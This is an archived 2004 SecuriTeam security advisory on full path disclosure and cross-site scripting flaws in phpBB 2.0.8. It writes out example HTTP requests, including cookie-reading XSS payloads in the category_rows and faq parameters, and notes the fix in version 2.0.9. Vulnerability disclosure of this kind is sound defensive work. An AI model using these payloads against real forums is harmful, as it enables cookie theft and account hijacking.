[UNIX] phpBB Full Path Disclosure and XSS Vulnerability (category_rows, faq, ranksrow)
From: SecuriTeam (support_at_securiteam.com)
Date: 07/22/04
- Previous message: SecuriTeam: "[UNIX] PHPNuke Multiple Vulnerabilities in Search Module"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Jul 2004 18:14:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
phpBB Full Path Disclosure and XSS Vulnerability (category_rows, faq,
ranksrow)
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and
highly customizable open-source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel,
and helpful FAQ. Based on the powerful PHP server language and your choice
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal free community solution for all web sites."
Full path disclosures as well as cross-site scripting attacks are possible
due to uninitialized arrays in the phpBB code. 'register_globals' must be
enabled on a server in order to exploit this vulnerability.
DETAILS
Vulnerable Systems:
* PhpBB version 2.0.8 and prior
Immune Systems:
* PhpBB version 2.0.9
Below are example HTTP requests that demonstrate the vulnerabilities. The
type of vulnerability precedes each example and it's location.
Full Path Disclosure:
Full path disclosure in "index.php":
http://localhost/phpbb208/index.php?category_rows=waraxe
Response:
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\index.php on line 120
Full path disclosure in "language\lang_english\lang_faq.php":
http://localhost/phpbb208/faq.php?faq=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\language\lang_english\lang_faq.php on line 41
Full path disclosure in "language\lang_english\lang_bbcode.php ":
http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\language\lang_english\lang_bbcode.php on line
46
Full path disclosure in "includes\usercp_viewprofile.php":
http://localhost/phpbb208/profile.php?mode=viewprofile&u=2&ranksrow=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\includes\usercp_viewprofile.php on line 46
Cross-Site Scripting:
Cross-site scripting in "index.php":
http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe <scr!pt>alert(document.cookie);</scr!pt>&category_rows[0][cat_order]=99
Cross-site scripting in "language\lang_english\lang_faq.php":
http://localhost/phpbb208/faq.php?faq[0][0]=f00<scr!pt>alert(document.cookie);</scr!pt>bar&faq[0][1]=waraxe
Cross-site scripting in "language\lang_english\lang_bbcode.php":
http://localhost/phpbb208/faq.php?mode=bbcode&faq[0][0]=f00<scr!pt>alert(document.cookie);</scr!pt>bar&faq[0][1]=waraxe
Vendor Status:
The vendor has been contacted and a newer version is available for
download. Users are encouraged to upgrade to the newer version.
ADDITIONAL INFORMATION
The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
Vind.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] PHPNuke Multiple Vulnerabilities in Search Module"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpBB is "a high
powered, fully scalable, and ... able to inject any type of SQL query to the back-end database
server. ... (Securiteam) - [EXPL] phpBB Multiple User Registeration DoS (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... these users can be used to cause
a DoS against the phpBB product. ... int Connection; ... Write_In(sock, Path,
Pro_Sea, Host, x); ... (Securiteam) - [UNIX] phpBB u Variable SQL Injection
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpBB is "a high
powered, fully scalable, and ... An SQL injection vulnerability exists in the uid field
sent to phpBB, ... (Securiteam) - [UNIX] PhpBB SQL Injection In Search Results Variable
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... phpBB is "a high
powered, fully scalable, and ... This bulletin is sent to members of the SecuriTeam mailing
list. ... (Securiteam) - [Full-Disclosure] [waraxe-2004-SA#034 - XSS and path full path disclosure in PhpBB 2.0.8]
... PhpBB is widely used and very popular forum software, ... A - Full Path Disclosure
... Fatal error: operator not supported for strings in ... (Full-Disclosure)
